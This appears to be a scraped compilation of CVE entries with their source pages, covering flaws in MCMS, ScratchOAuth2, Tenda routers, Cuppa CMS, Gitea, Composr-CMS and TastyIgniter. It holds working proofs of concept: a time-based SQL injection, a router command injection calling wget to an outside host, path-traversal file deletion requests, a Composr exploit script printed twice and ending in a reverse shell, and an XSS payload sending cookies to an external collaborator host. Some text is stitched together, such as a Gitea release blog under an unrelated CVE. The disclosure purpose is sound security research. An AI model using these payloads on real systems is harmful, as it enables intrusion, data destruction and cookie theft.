A problem was found in ming-soft MCMS v5.1. There is a sql injection vulnerability in /ms/cms/content/list.do

**Vulnerability file:**

/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java

#Vulnerability tracking path:

    1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --The return value of call queryChildren() is tained
    2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --Tainted value is returned
    3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --The return value of call
    queryChildren() is tained
    4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --Tainted value is assigned to variable columns
    5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call iterator() from the this argument, then taints the return value
    6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column~iterator
    7.  MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call next() from the this argument, then taints the return value
    8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column
    9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call getId() from the this argument, then taints the return value
    10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java:52行  --Tainted variable this.id is returned
    11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
    12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java:148行  --Tainted value is assigned to variable this.categoryId
    13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:183行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
    14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java:77行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
    15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml:253行  --categoryId
    

The risk of `SQLI` type is triggered, caused by the input parameter `categoryId`, value:  
![image](https://user-images.githubusercontent.com/28668177/144779117-23137116-15b2-40da-995e-ac6ee65e593f.png)

**poc**

    POST /ms/cms/content/list.do HTTP/1.1
    Host: cms.demo.mingsoft.net
    Content-Length: 21
    Pragma: no-cache
    Cache-Control: no-cache
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: http://cms.demo.mingsoft.net
    Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: ****
    Connection: close
    
    contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'
    

![image](https://user-images.githubusercontent.com/28668177/144756596-ed4aa2a1-0f59-4e34-b11a-d78edd4e04e2.png)

![image](https://user-images.githubusercontent.com/28668177/144756806-8624d3df-78c5-46a4-bcad-120cfcc275f7.png)  
![image](https://user-images.githubusercontent.com/28668177/144756834-e9863355-3b31-48ae-a2da-f0f69af68bef.png)

CVE-2021-44868: MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability · Issue #58 · ming-soft/MCMS

A Cross-Site Request Forgery (CSRF) in RequirementsBypassPage.php of Scratch Wiki scratch-confirmaccount-v3 allows attackers to modify account request requirement bypasses.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Fix CSRF when adding requirements bypass #155**

CVE-2021-46252: Fix CSRF when adding requirements bypass by apple502j · Pull Request #155 · InternationalScratchWiki/scratch-confirmaccount-v3

A reflected cross-site scripting (XSS) in ScratchOAuth2 before commit 1603f04e44ef67dde6ccffe866d2dca16defb293 allows attackers to execute arbitrary web scripts or HTML via a crafted POST request.

Permalink

Browse files

SECURITY: Escape username in invalid username error

POST request with invalid usernames to SpecialScratchOAuth2 page in 
ScratchOAuth2 may lead to reflected cross-site scripting.

*   Loading branch information

![@apple502j](https://avatars.githubusercontent.com/u/33279053?s=40&v=4)

1 parent d856dc7 commit 1603f04e44ef67dde6ccffe866d2dca16defb293

Showing with **1 addition** and **1 deletion**.

1.  +1 −1 includes/special/SpecialScratchOAuth2.php

@@ -69,7 +69,7 @@ public function specialLogin( $error = null ) {

$username = $request\->getVal( 'username', '', );

if (!preg\_match(SOA2\_USERNAME\_REGEX, $username)) {

$this\->specialLogin(

wfMessage('soa2-invalid-username', $username)->plain()

wfMessage('soa2-invalid-username')->plaintextParams($username)->parse()

);

return;

}

**0 comments on commit `1603f04`**

Please sign in to comment.

CVE-2021-46251: SECURITY: Escape username in invalid username error · ScratchVerifier/ScratchOAuth2@1603f04

An issue in SOA2Login::commented of ScratchOAuth2 before commit a91879bd58fa83b09283c0708a1864cdf067c64a allows attackers to authenticate as other users on downstream components that rely on ScratchOAuth2.

Permalink

Browse files

SECURITY: Use strict comparison when authenticating

Incorrect comparison (autocasting) in SOA2Login::commented in 
ScratchOAuth2 allows unprivileged attackers to authorize as other users 
on downstream components that rely on ScratchOAuth2, as demonstrated by 
"1234567890" and "123456789e1".

*   Loading branch information

![@apple502j](https://avatars.githubusercontent.com/u/33279053?s=40&v=4)

1 parent 0ead14a commit a91879bd58fa83b09283c0708a1864cdf067c64a

Showing with **1 addition** and **1 deletion**.

1.  +1 −1 includes/common/login.php

@@ -52,7 +52,7 @@ public static function commented( string $username, string $code ) {

$matches = \[\];

preg\_match\_all(SOA2\_COMMENTS\_REGEX, $comments, $matches, PREG\_PATTERN\_ORDER);

for ($i = 0; $i < count($matches\[0\]); ++$i) {

if (strtolower($matches\[1\]\[$i\]) != $username) continue;

if (strtolower($matches\[1\]\[$i\]) !=\= $username) continue;

if (hash\_equals($code, $matches\[2\]\[$i\])) return true; // Step 22

}

return false;

**0 comments on commit `a91879b`**

Please sign in to comment.

CVE-2021-46250: SECURITY: Use strict comparison when authenticating · ScratchVerifier/ScratchOAuth2@a91879b

A vulnerability was discovered in Tenda AC9 v3.0 V15.03.06.42_multi and Tenda AC9 V1.0 V15.03.05.19(6318)_CN which allows for remote code execution via shell metacharacters in the guestuser field to the __fastcall function with a POST request.

vendor:Tenda

product:AC9 AC15 AC18

version:V15.03.06.42\_multi(AC9)，V15.03.05.19(6318)\_CN(AC9) and earlier

type:Arbitrary Command Execution

author:Li Yuan Cheng

institution:School of Computer and Cyberspace@Communication University of China

**Vulnerability description**

I found an `Arbitrary Command Execution` vulnerability in the router's web server--httpd. While processing the `guestuser` parameters for a post request, the value is directly passed to doSystem, which causes a rce. The details are shown below: ![image](https://github.com/Lyc-heng/routers/raw/a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180/routers/imgs/rce1/rce1.png)

**PoC**

    POST /goform/SetSambaCfg HTTP/1.1
    Host: 192.168.0.1
    Proxy-Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
    Cookie: password=hwrmji
    Content-Length: 154
    
    password=111111&premitEn=0&internetPort=21&action=delelte&usbName=1&guestpwd=guest&guestuser=;wget http://192.168.0.198:8888;&guestaccess=r&fileCode=UTF-8
    

While `action`!=`del`,after the first request is sent, the `guestuser` will be set to `;wget http://192.168.0.198:8888;`, and the router will read the value of `guestuser` for the second send, and then execute `wget http ://192.168.0.198:8888`. `192.168.0.198` is our native computer's ip, then we use nc to listen port 8888, finally we capture http request from `192.168.0.1`, as shown in the figure below.

We tested the vulnerability on a real device, the picture may be a bit fuzzy, but I recorded a video, you can view the specific triggering process of the vulnerability through the video

![image](https://github.com/Lyc-heng/routers/raw/a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180/routers/imgs/rce1/rce2.png)

Watch the operation video

CVE-2020-26728: routers/rce1.md at a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180 · Lyc-heng/routers

Cuppa CMS v1.0 was discovered to contain an arbitrary file deletion vulnerability via the unlink() function.

Vulnerability Name: Multiple Arbitrary File Deletion

Date of Discovery: 06 Feb 2022

Product version:cuppaCMS v1.0Download link

Author: lyy

Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.

Proof of Concept 1

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php  
Vulnerable Code: line 116,118 - cuppacms/js/filemanager/api/FileManager.php  
![image](https://user-images.githubusercontent.com/73013511/152651442-b5877979-3514-4de3-87e6-03eb3d91550c.png)

Steps to Reproduce:  
1.Send the request directly through burp

    POST /js/filemanager/api/index.php HTTP/1.1
    Host: cuppacms
    Content-Length: 45
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
    Content-Type: application/json
    Accept: */*
    Origin: http://cuppacms
    Referer: http://cuppacms/js/filemanager/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    {"path":"/../test.php","action":"deleteFile"}
    

![image](https://user-images.githubusercontent.com/73013511/152651770-251bc12c-4934-423c-86a9-18fe254c7a51.png)

2.You can traverse the directory to delete any file

Proof of Concept 2

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php  
Vulnerable Code: line 124,138 - cuppacms/js/filemanager/api/FileManager.php  
![image](https://user-images.githubusercontent.com/73013511/152651571-11f2ac07-17b4-4823-93c3-d6f52435c239.png)

Steps to Reproduce:  
1.Send the request directly through burp

    POST /js/filemanager/api/index.php HTTP/1.1
    Host: cuppacms
    Content-Length: 40
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
    Content-Type: application/json
    Accept: */*
    Origin: http://cuppacms
    Referer: http://cuppacms/js/filemanager/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    {"path":"/../1","action":"deleteFolder"}
    

![image](https://user-images.githubusercontent.com/73013511/152651695-bba1ea44-1216-4a7a-b026-0f8d58eff9db.png)

2.You can traverse directories and delete directories，Delete all files in the directory while deleting the directory, so as to achieve the effect of deleting any file

CVE-2022-24647: Multiple Unauthorized Arbitrary File Deletion vulnerabilities · Issue #23 · CuppaCMS/CuppaCMS

An Authentication Bypass vulnerability exists in Gitea before 1.5.0, which could let a malicious user gain privileges. If captured, the TOTP code for the 2FA can be submitted correctly more than once.

_Fri Aug 10, 2018_ by **thehowl**

The time has come for another major release! We are happy to present Gitea 1.5.0 to the world. In this release, we merged 258 pull requests – just a bit more than last time (236).

You can download one of our pre-built binaries from our downloads page - make sure to select the correct platform! For further details on how to install, follow our installation guide.

We’d like to thank all of our backers on Open Collective, who are helping us deliver a better piece of software.

With that out of the way, here’s what’s new in 1.5.0:

**Topics (#3711)**

![Topics demo](https://blog.gitea.io/demos/3711/1.gif)

You can now neatly organise your repositories using topics, similar to those on GitHub.

_Thanks to **@lunny**_

**Emoji Completion (#3433)**

![Demo of emoji completion](https://blog.gitea.io/demos/3433/1.gif)

The issue editor will now provide suggestions for completing emojis when starting to type an emoji shortcode - in a similar fashion to mention autocompletion, which we added in 1.4.0.

_Thanks to **@modmew8**_

**Global Code Search (#3664)**

![Screenshot of Global Code Search](https://blog.gitea.io/demos/3664/1.png)

We expanded our repo code search to allow for searching even MORE stuff - which is to say, your entire Gitea instance! If you go on Explore, you will now be able to search everywhere, **if you have code search enabled.**

_Thanks to **@lunny**_

**FIDO U2F Authentication (#3971)**

![](https://blog.gitea.io/demos/3971/1.gif)

Boost your security by adding FIDO U2F for authentication. 🚀

_Thanks to **@JonasFranzDEV**_

**Issue Due Date (#3794)**

![Screenshot of issue due dates in the issue listing](https://blog.gitea.io/demos/3794/1.png) ![Form to add a due date](https://blog.gitea.io/demos/3794/2.png) ![Added issue date](https://blog.gitea.io/demos/3794/3.png)

Deadlines: following them is both the Project Manager’s dream and the Developer’s nightmare. But, time and again it has been proven that they are, indeed, very useful, so now you can select due dates on issues to mark when they _should_ be finished. Emphasis on the _should_ there.

_Thanks to **@kolaente**_

**Multiple Assignees (#3705)**

![Screenshot of 2 people being assigned to an issue.](https://blog.gitea.io/demos/3705/1.png)

In Gitea 1.5.0, you’ll be able to assign multiple people to a single issue. For cases where you’ll need more manpower in order to understand the cryptic code left by old developers of the legacy codebase.

_Thanks to **@kolaente**_

**Label Descriptions (#3662)**

![Label descriptions on the labels page](https://blog.gitea.io/demos/3662/1.png)

![Tooltip when hovering over a label](https://blog.gitea.io/demos/3662/2.png) ![Description is shown on the label picker as well](https://blog.gitea.io/demos/3662/3.png)

_Enhancement_ is a funny word, isn’t it? It’s sort of like a feature but it’s not as big as a feature. It might not be instantly clear to everyone who reads it, but you can help them understand through the use of the new descriptions!

_Thanks to **@lafriks**_

**Total Tracked Time (#3341)**

![Demo on a milestone](https://blog.gitea.io/demos/3341/1.png)

You can now track the total amount of time you spent on a single issue - or even an entire milestone.

_Thanks to **@JonasFranzDEV**_

**Other changes**

*   You can now specify a second whitelist for protected branches, allowing you to select users who are able to merge PRs. (#3689)
*   We did some optimisations on the repository search feature - users report up to a 3x reduction in disk usage by the indexer. (#3452)
*   Power to webhooks! We added support for delete, fork, issues, issue\_comment, and release webhooks, which have long been a requested feature ever since webhooks first came to Gogs. (#3929)
*   Some changes were made to how Gitea handles messages with custom markup, such as commit messages and issue comments. Mentions, emails, links and so on should now be correctly handled. (#3354)
*   If your team is used to placing issue references in square brackes (ie. `[JIRA-123]`), we now correctly parse that! (#3408)
*   From the admin panel, you can now run `git fsck` (health check) on all your repositories, as well as disable it entirely if desired. (#3606, #3607)
*   We added some new features to Gitea’s API, such as issue search and attachments. (#3478, #3612)
*   Symlinks in a repository are now marked by a distinctive icon. (#3826)
*   We’ll remember your preferred language so that you don’t have to change it for each browser that you use. (#3875)
*   If you want to disable time tracking entirely, you can now do so from the app settings. (#3719)
*   Various changes to improve consistency and grammar in the English localisation. (Various)
*   You can now sort repos in Explore and the admin panel by stars or forks. (#3969)
*   If you use drone, there is now a handy plugin to create releases and attachments: http://plugins.drone.io/drone-plugins/drone-gitea-release/
*   Starting from 1.5.0, we’ll sign all our releases with our GPG Key, so you can be sure it’s us.

To see all user-facing changes that went into the release, check out our

full changelog.

A shoutout goes to those who reported and/or fixed security issues in this release:

*   @cezar97 (#3878)

**Deprecation notice:** in the upcoming major release (1.6.0) we will drop support for Go 1.8 and also embedded TiDB.

**Help us out!**

Gitea is focused on community input and contributions. To keep a project like Gitea going we need people. **_LOTS_** of people. You can help in the following areas:

**Programming**

If you know Go or HTML/CSS/JavaScript, you may be interested in working on the code. Working on OSS may seem scary, but the best way is to try! Read the Gitea contribution guide, and then find an itch to scratch, or scratch your own!

**Translating**

Want to translate Gitea in your own language? Awesome! Join the Gitea project on Crowdin. As soon as your translation is approved, it will be pushed to the Gitea project to be used in future releases!

**Documentation**

Documentation is important, but also time consuming. If you enjoy writing and have a pretty good knowledge of English, or you would like to translate the English version to your native language, you’re very welcome to do so. Find our documentation on the main git repository here. Just fork, update the documentation and then create a pull request!

**Support**

Do you like people? Can you give calm and thought-out responses to users needing help? Then you can spend some time providing support to those who need it. Most answers can really be found in the documentation, so make sure to take some time to read it. Then, either join our chat or forums (linked below), or simply help us sort out issues and answer questions on the Gitea repository.

**Donations**

If you, or your company, want to help us out sustain our financial expenses, you can do so by donating on Open Collective.

**… or reporting bugs**

If you lack the time or knowledge to do any of the above, just using Gitea and sharing the word is enough to make us happy! One thing you can always do is to report any bugs you find on the Gitea issue tracker.

Before opening an issue, read the contribution guidelines about reporting bugs. After opening an issue, try to stick around a while to answer any questions we might have. Replies greatly help us find the root cause of an issue.

**Thanks**

This release would not have been possible without the pull requests from the following people:

*   @0rzech
*   @AleksandrBulyshchenko
*   @alxwrd
*   @andruwa13
*   @appleboy
*   @aswild
*   @aunger
*   @axifive
*   @bkcsoft
*   @BNolet
*   @bugreport0
*   @Bwko
*   @cez81
*   @charlesreid1
*   @Chri-s
*   @christopherjmedlin
*   @cleverer
*   @coolaj86
*   @daviian
*   @derkoe
*   @devil418
*   @dnmgns
*   @domrim
*   @dpeukert
*   @ethantkoenig
*   @FabioFortini
*   @flufmonster
*   @francoism90
*   @funkyfuture
*   @harryxu
*   @HoffmannP
*   @inful
*   @InonS
*   @jesselucas
*   @JonasFranzDEV
*   @kolaente
*   @lafriks
*   @liamcottam
*   @lunny
*   @marcinkuzminski
*   @michaelkuhn
*   @microbug
*   @modmew8
*   @monkeywithacupcake
*   @mqudsi
*   @naiba
*   @neezer
*   @nickolas360
*   @phtan
*   @pjeby
*   @qianlei90
*   @rvillablanca
*   @sapk
*   @sdwolfz
*   @serverwentdown
*   @Siosm
*   @stevegt
*   @tbraeutigam
*   @techknowlogick
*   @teepark
*   @tf198
*   @thehowl
*   @Treora
*   @tuxillo
*   @vityafx
*   @xwjdsh

PRs and issues merged in 1.5.0.

**Get in touch**

Need help with anything? You can come on our Discord server, or if you’re more old-fashioned you can also use our forums.

CVE-2021-45331: Gitea 1.5.0 is released - Blog

Authenticated remote code execution (RCE) in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a PHP shell through /adminzone/index.php?page=admin-commandr.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39

\# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 12th January,2022

\# CVE ID: CVE-2021-46360

\# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS

\# Vendor: https://compo.sr/download.htm

###############################################

#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3

import requests

from bs4 import BeautifulSoup

import time

cookies \= {

'has\_cookies': '1',

'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic

'commandr\_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',

'last\_visit': '1641783779',

'cms\_session\_\_b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic

}

headers \= {

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Accept': '\*/\*',

'Origin': 'http://192.168.56.116',

'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',

'Accept-Language': 'en-US,en;q=0.9',

}

params \= (

('keep\_session', 'ef14cc258d93a'), #You need to change this as it is dynamic

)

data \= {

'\_data': 'command=rm .htaccess', \# This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)

'csrf\_token': 'ef14cc258d93a' #You need to change this as it is dynamic

}

r \= requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep\_session=ef14cc258d93a', headers\=headers, params\=params, cookies\=cookies, data\=data, verify\=False)

soup \= BeautifulSoup(r.text, 'html.parser')

#datap=response.read()

print (soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (

#Step 3 Now visit http://IP\_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─\[ci@parrot\]─\[~\]

└──╼ $nc \-lvvnp 4444

listening on \[any\] 4444 ...

connect to \[192.168.56.103\] from (UNKNOWN) \[192.168.56.116\] 58984

Linux CVE\-Hunting\-Linux 5.11.0\-44\-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux

13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm\-x\-session \-\-run\-script env GNOME\_SHELL\_SESSION\_MODE\=ubuntu /usr/bin/gnome\-session \-\-systemd \-\-session\=ubuntu

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

daemon

$ id

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

$ pwd

/

$

CVE-2021-46360: 0days/Exploit.py at main · sartlabs/0days

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39

\# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 12th January,2022

\# CVE ID:

\# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS

\# Vendor: https://compo.sr/download.htm

###############################################

#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3

import requests

from bs4 import BeautifulSoup

import time

cookies \= {

'has\_cookies': '1',

'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic

'commandr\_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',

'last\_visit': '1641783779',

'cms\_session\_\_b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic

}

headers \= {

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Accept': '\*/\*',

'Origin': 'http://192.168.56.116',

'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',

'Accept-Language': 'en-US,en;q=0.9',

}

params \= (

('keep\_session', 'ef14cc258d93a'), #You need to change this as it is dynamic

)

data \= {

'\_data': 'command=rm .htaccess', \# This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)

'csrf\_token': 'ef14cc258d93a' #You need to change this as it is dynamic

}

r \= requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep\_session=ef14cc258d93a', headers\=headers, params\=params, cookies\=cookies, data\=data, verify\=False)

soup \= BeautifulSoup(r.text, 'html.parser')

#datap=response.read()

print (soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (

#Step 3 Now visit http://IP\_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─\[ci@parrot\]─\[~\]

└──╼ $nc \-lvvnp 4444

listening on \[any\] 4444 ...

connect to \[192.168.56.103\] from (UNKNOWN) \[192.168.56.116\] 58984

Linux CVE\-Hunting\-Linux 5.11.0\-44\-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux

13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm\-x\-session \-\-run\-script env GNOME\_SHELL\_SESSION\_MODE\=ubuntu /usr/bin/gnome\-session \-\-systemd \-\-session\=ubuntu

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

daemon

$ id

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

$ pwd

/

$

A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable.

**CVE-2022-23378 : Reflected XSS in TastyIgniter v3.2.2 Restaurtant CMS**

Authenticated reflected XSS exists in the TastyIgniter Admin dashboard in version v3.2.2.

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23378

**Proof of Concept (POC):****Admin Dashboard Allergens:**

**Affected URL:** `/admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20`

**Source code file affected:** `./vendor/league/flysystem/src/FileNotFoundException.php`

When updating an allergen within the administrator dashboard, an option to attach an image to the allergen is available. When attached, a POST request with parameters pertaining to data about the image is submitted. The parameter `items%5B0%5D%5Bpath%5D` is vulnerable to JavaScript injection, resulting in a potential vector for Cross-Site Scripting (XSS). When including the XSS payload, the server responds with an error message containing and executing the XSS payload.

Original POST request with XSS payload:

POST /admin/allergens/edit/1 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

items%5B0%5D%5Bname%5D=image.jpeg&items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20&items%5B0%5D%5Bsize%5D=192&items%5B0%5D%5BlastModified%5D=1642193919&items%5B0%5D%5Btype%5D=file&items%5B0%5D%5BpublicUrl%5D=http%3A%2F%2F<REDACTED>%2Fassets%2Fmedia%2Fuploads%2Fimage.jpeg

![01_Original_POST](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/01_Original_POST.png)

Server Response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
Set-Cookie: tastyigniter\_session=e----8<\----In0%3D; expires\=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age\=7200; path\=/; httponly; samesite\=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

Furthermore, the request can be changed to a GET request with the affected parameter included within the URL, further increasing the likelihood of success for an adversary to exploit on a phished victim.

Modified GET request:

GET /admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

![02_Modified_GET](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/02_Modified_GET.png)

Response remains the same:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
